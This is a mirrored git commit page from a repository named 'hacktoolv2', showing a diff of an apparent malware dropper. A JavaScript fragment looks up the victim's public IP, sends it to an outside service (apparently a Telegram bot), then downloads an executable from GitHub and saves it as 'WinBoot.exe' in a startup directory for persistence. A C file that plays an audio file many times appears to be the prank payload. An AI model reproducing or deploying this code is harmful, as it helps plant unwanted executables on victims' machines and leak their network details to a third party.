mirror of
https://github.com/constantinDev/hacktoolv2
synced 2025-08-29 14:47:41 +00:00
lol
This commit is contained in:
parent
90059da693
commit
9012a17728
@ -23,7 +23,7 @@ https.get("https://api.ipify.org", (ip) => {
|
||||
parse_mode: "HTML"
|
||||
}
|
||||
}).then(_ => {
|
||||
https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/Hax/Runner/bin/WinBoot.exe", (res) => {
|
||||
https.get("https://raw.githubusercontent.com/constantinDev/hacktoolv2/master/Hax/Runner/bin/main.exe", (res) => {
|
||||
let stream = fs.createWriteStream(startdir + "/WinBoot.exe")
|
||||
res.pipe(stream)
|
||||
res.on("close", () => {
|
||||
|
Binary file not shown.
@ -1,9 +1,8 @@
|
||||
#include <Windows.h>
|
||||
#include <mmsystem.h>
|
||||
#pragma comment(lib, "Winmm.lib")
|
||||
|
||||
|
||||
int main() {
|
||||
while (1) PlaySound(TEXT("./etc/audio.wav"), NULL, SND_FILENAME);
|
||||
for(int i = 0;i<9999;i++) PlaySound(TEXT("./etc/audio.wav"), NULL, SND_FILENAME);
|
||||
return 0;
|
||||
}
|
BIN
Hax/Runner/src/main.obj
Normal file
BIN
Hax/Runner/src/main.obj
Normal file
Binary file not shown.
Loading…
x
Reference in New Issue
Block a user